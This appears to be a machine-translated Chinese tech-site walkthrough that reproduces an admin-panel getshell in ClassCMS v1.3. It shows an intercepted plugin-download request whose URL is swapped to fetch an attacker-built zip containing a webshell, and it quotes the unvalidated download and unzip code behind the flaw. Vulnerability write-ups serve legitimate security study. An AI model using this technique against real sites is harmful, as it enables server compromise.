Shulou(Shulou.com)05/31 Report--

How to ClassCMS background getshell reproduction, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

About ClassCMS the official website of ClassCMS: https://classcms.com/ website

ClassCMS is a simple and flexible open source content management system, which can be used to quickly develop a variety of website applications.

Compatible with PHP5.2--PHP8.0, it can be used on APACHE, NGINX and IIS. MySQL SQLite databases are supported by default, and millions of data are supported.

The system has no extra functions, the overall installation package is less than 1m (less than 300KB without editor and Layui), has a perfect and flexible application plug-in mechanism, and common functions can be made into application plug-ins.

The system template language is simple, only need to understand HTML+CSS to make a simple website template.

Background page based on Layui production, adaptive page, in the mobile side also has a good experience.

Through the background model, you can quickly add columns, support unlimited columns, column URL support Chinese.

Has all kinds of input box types, can quickly expand article fields, column variables, user attributes, through the application of plug-ins can also be easily expanded to make all kinds of input boxes.

There is a perfect authority system in the background, which can customize the permissions of each role, customize the columns and input boxes and view and modify permissions.

Black box test reproduction of Getshell in ClassCMS background

ClassCMS downloads the latest version v1.3

After downloading and decompressing the program, the following figure is shown

Set up the environment and start

Configure the configuration

Open App Management-App Store

Click on any app to download

Grab the package when you click to download

Get the return packet

At this time, a plugin download address will be returned.

Continue Forward

POST / admin/?do=shop:downloadClass&ajax=1 HTTP/1.1Host: 192.168.253.1:8013Content-Length: 142Accept: application/json, text/javascript, * / *; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36Content-Type: application/x-www-form-urlencoded Charset=UTF-8Origin: http://192.168.253.1:8013Referer: http://192.168.253.1:8013/admin/?do=shop:index&bread=304%E7%BC%93%E5%AD%98%E6%8F%92%E4%BB%B6&action=detail&classhash=cache304Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: token_43f1a9=53f68d86f94ad3c93551924e77d0e91a; csrf_43f1a9=5f5244ceConnection: closeclasshash=cache304&url=http%3A%2F%2Fclasscms.com%2Fshop%2F%3Faction%3Ddownload%26version%3D1.0%26classhash%3Dcache304%26token%3D&csrf=5f5244ce

Give / admin/?do=shop:downloadClass&ajax=1 POST a plug-in address and plug-in name

Create a new pony and compress it

Upload it to the server and download it, or you can find the place where the file can be uploaded on the website.

Change the URL to the address of the compressed package

Then visit

Http://192.168.253.1:8013/class/cache304/index.php

Pony has been uploaded successfully.

White-box test reproduction of ClassCMS background Getshell

View line 82 of / class/shop/shop.php directly.

The this:download function is called directly

Function download ($url,$filepath) {$curl=curl_init (); curl_setopt ($curl,CURLOPT_URL,$url); if (! $fp = @ fopen ($filepath,'w+')) {Return false;} curl_setopt ($curl,CURLOPT_FILE, $fp); curl_setopt ($curl,CURLOPT_CONNECTTIMEOUT,10); curl_setopt ($curl,CURLOPT_TIMEOUT,300); curl_setopt ($curl,CURLOPT_SSL_VERIFYPEER,FALSE); curl_setopt ($curl,CURLOPT_SSL_VERIFYHOST,FALSE); $info=curl_exec ($curl); $httpinfo=curl_getinfo ($curl) Curl_close ($curl); fclose ($fp); if ($httpinfo ['http_code'] > = 300) {@ unlink ($filepath); Return false;} Return $info;}}

And then to line 92.

If (C ('cms:class:unzip',$classfile,$classdir)) {@ unlink ($classfile); if (C (' cms:class:refresh',$classhash)) {echo (array ('msg'= > "download completed, please install this application in the application management page")); Return;} else {echo (array (' msg'= > "installation package format error, Please try again, 'error'= > 1)); Return;} else {@ unlink ($classfile)) Echo (array ('msg'= > "failed to extract the installation package, please try again",' error'= > 1)); Return;}

Called the unzip method under / cms/class.php

Function unzip ($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true) {if ('ZipArchive')) {$zip = new ZipArchive;if ($zip- > open ($src_file) = TRUE) {if (@ $zip- > extractTo ($dest_dir)) {$zip- > close (); Return true;} $zip- > close ();} elseif (function_exists (' zip_open')) {if (! cms_createdir ($dest_dir)) {Return false } if ($zip = zip_open ($src_file)) {if ($zip) {if ($create_zip_name_dir) {$splitter='.';} else {$splitter='/';} if ($dest_dir = false) {$dest_dir = substr ($src_file, 0, strrpos ($src_file, $splitter). "/";} while ($zip_entry = @ zip_read ($zip)) {$pos_last_slash = strrpos (zip_entry_name ($zip_entry), "/") If ($pos_last_slash! = = false) {cms_createdir ($dest_dir.substr (zip_entry_name ($zip_entry), 0, $pos_last_slash+1);} if (zip_entry_open ($zip,$zip_entry, "r")) {$file_name = $dest_dir.zip_entry_name ($zip_entry); if ($overwrite = true | | $overwrite = = false & &! is_file ($file_name)) {$fstream = zip_entry_read ($zip_entry, zip_entry_filesize ($zip_entry)) @ file_put_contents ($file_name, $fstream);} zip_entry_close ($zip_entry);} @ zip_close ($zip);} Return true;}} Return false;}

The downloaded file will be decompressed directly to form the background getshell.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.